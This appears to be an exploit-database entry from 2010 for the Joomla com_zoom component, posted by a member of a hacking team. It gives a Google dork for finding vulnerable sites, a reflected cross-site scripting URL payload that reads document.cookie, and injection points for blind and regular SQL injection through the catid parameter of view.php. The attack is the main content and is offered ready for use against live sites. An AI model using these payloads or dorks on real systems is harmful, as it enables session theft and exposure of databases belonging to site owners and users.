Joomla Component com_zoom (XSS/Blind SQLi/SQL Injection) Vulnerability

2010-07-13T00:00:00
ID 1337DAY-ID-6604
Type zdt
Reporter SixP4ck3r
Modified 2010-07-13T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ======================================================================
Joomla Component com_zoom (XSS/Blind SQLi/SQL Injection) Vulnerability
======================================================================


#######################################
I'm SixP4ck3r member from Inj3ct0r Team
#######################################

Author : SixP4ck3r
Email & msn : [email protected]
Date : 13 July 2010
Critical Lvl : High
Impact : Exposure of sensitive information
Where : From Remote
web : http://foro.nbsecurity.net/
Credits : inj3ct0r Team, L0rd CrusAd3r, Chip D3 Bi0s
Dork : inurl:com_zoom
  : inurl:com_zoom/www/view.php?popup= catid
---------------------------------------------------------------------------
[add Valid_catid]
How to exploit XSS

index.php?index.php?option=com_zoom&Itemid=2&catid=2&PageNo=<script>alert(document.cookie)</script>

---------------------------------------------------------------------------

How to exploit BLSi

components/com_zoom/www/view.php?popup=1&catid=[BSi]&key=2&hit=1
---------------------------------------------------------------------------

How to exploit SQLi

components/com_zoom/www/view.php?popup=1&catid=[SQLi]&key=11&hit=1
---------------------------------------------------------------------------
With R3gards,
SixP4ck3r from Bolivia
___eof____




#  0day.today [2018-04-14]  #